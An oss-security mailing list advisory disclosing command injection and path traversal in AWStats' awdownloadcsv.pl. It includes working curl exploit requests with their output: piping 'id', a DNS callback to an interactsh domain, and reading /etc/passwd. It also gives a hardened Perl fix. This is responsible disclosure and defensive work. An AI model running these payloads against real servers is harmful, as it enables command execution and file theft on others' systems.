oss-sec mailing list archives

AWStats awdownloadcsv.pl command injection and path traversal vulnerabilities


From: "christopher.downs" <christopher.downs () vadersecurity com>
Date: Sun, 08 Mar 2026 08:26:23 +0000

Evening,
Two vulnerabilities were identified in the AWStats CGI script awdownloadcsv.pl that may allow command injection and 
arbitrary file access.

Repository:
https://github.com/eldy/AWStats/tree/develop

Examples shown below are running locally in a Docker container for demonstration. 

Download functionality is disabled by default ($ALLOWDOWNLOAD=0), as the script header shows:

#!/usr/bin/perl -w
#------------------------------------------------------------------------------
# Free addition to AWStats Web Log Analyzer. Used to export the contents of
# sections of the Apache server log database to CSV for use in other tools.
# Works from command line or as a CGI.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------------------------
use CGI qw(:standard);

my $ALLOWDOWNLOAD=0;
----- SNIP -----

Issue 1: Command Injection

The "section" parameter appears to be incorporated into shell commands without proper sanitization. Injection of shell 
metacharacters such as "|" may allow an attacker to escape the intended command pipeline. 

Example request(s):

vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|id&outputFile=/tmp/j.csv'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
vectorium-x[main] %

vectorium-x[main*] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|getent%20hosts%20d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun&outputFile=/tmp/j.csv'

206.189.156.69  d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
vectorium-x[main*] %

/tmp % interactsh-client -dns-only -o /tmp/interact_$(date +%s).interact
    _       __                       __       __
   (_)___  / /____  _________ ______/ /______/ /_
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/

projectdiscovery.io

[INF] Current interactsh version 1.3.0 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (A) from 66.185.115.247 at 2026-03-08 07:02:25

Issue 2: Path Traversal / Arbitrary File Read

The "inputFile" parameter is used directly in file operations without validation, allowing directory traversal.

Example code pattern:

if ($q->param("inputFile")) {
    if ($inputFile eq '') { $inputFile = $q->param("inputFile"); }
}

open (IN, $inputFile) || die "cannot open $inputFile\n";

Example request:

vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&outputFile=/tmp/pwnd.csv'
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing,List,Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vectorium-x[main] %

/tmp/pwnd.csv written to disk:
vectorium-x[main] % curl -q --path-as-is 'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=|cat%20/tmp/pwnd.csv&outputFile='
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
----- SNIP -----
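The demonstrated requests for both issues carry their payload in inputFile, which reaches the quoted open (IN, $inputFile) call: Perl's two-argument open treats a value beginning with "|" as a pipe to a command and follows "../" literally. The handler below is an added example, not AWStats code; it confines the parameter to a single file name inside a data directory and opens it with a fixed read mode, using a temporary directory and a constructed data file so it runs stand-alone.

```perl
# Added example, not AWStats code: hardened handling of the "inputFile"
# CGI parameter for a script such as awdownloadcsv.pl. Two-argument
# open(IN, $inputFile) lets Perl parse the string for mode characters, so a
# value starting with "|" becomes a pipe to a command and "../" walks out of
# the data directory. A fixed '<' mode plus a base-directory check closes both.
use strict;
use warnings;
use File::Temp qw(tempdir);
use Cwd qw(realpath);

# Returns ($absolute_path, undef) when $param names an existing plain file
# directly inside $base, otherwise (undef, $reason).
sub safe_input_path {
    my ($base, $param) = @_;
    return (undef, 'empty parameter') unless defined $param && length $param;
    # One file-name component only: no "/" or "\", no open() mode characters
    # (| < > + &), no leading dot (which also excludes "." and "..").
    return (undef, 'disallowed characters in file name')
        unless $param =~ /\A[A-Za-z0-9][A-Za-z0-9._-]*\z/;
    my $real_base = realpath($base) // return (undef, 'base directory missing');
    my $real = realpath("$base/$param") // return (undef, 'file does not exist');
    # realpath follows symlinks, so a link pointing outside $base is caught too.
    return (undef, 'resolves outside data directory')
        unless index($real, "$real_base/") == 0 && -f $real;
    return ($real, undef);
}

# Three-argument open with a fixed '<' mode: the name is never interpreted,
# so "|cmd" or "cmd|" can no longer become a pipe.
sub read_csv_source {
    my ($path) = @_;
    open(my $in, '<', $path) or die "cannot open $path: $!\n";
    my $content = do { local $/; <$in> };
    close $in;
    return $content;
}

# Constructed demo data: a temporary data directory holding one real file.
my $data_dir = tempdir(CLEANUP => 1);
open(my $fh, '>', "$data_dir/awstats032026.example.com.txt") or die $!;
print $fh "BEGIN_GENERAL\nTotalVisits 42\nEND_GENERAL\n";
close $fh;

for my $param ('|id', '../../../../etc/passwd', 'awstats032026.example.com.txt') {
    my ($path, $why) = safe_input_path($data_dir, $param);
    print "$param => ", defined $path
        ? 'accepted, ' . length(read_csv_source($path)) . " bytes read\n"
        : "rejected ($why)\n";
}
```

The first two parameters are rejected before any file system call is made; only the plain data file name is resolved and read.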

Impact

Depending on deployment configuration, these issues may allow:

- command execution
- reading arbitrary files
- writing attacker-controlled output files

Disclosure

The upstream developer was contacted previously regarding these issues. No response was received, so this notice is 
being sent to the oss-security list for awareness.

August 30th 2025
September 6th 2025

Thanks All --
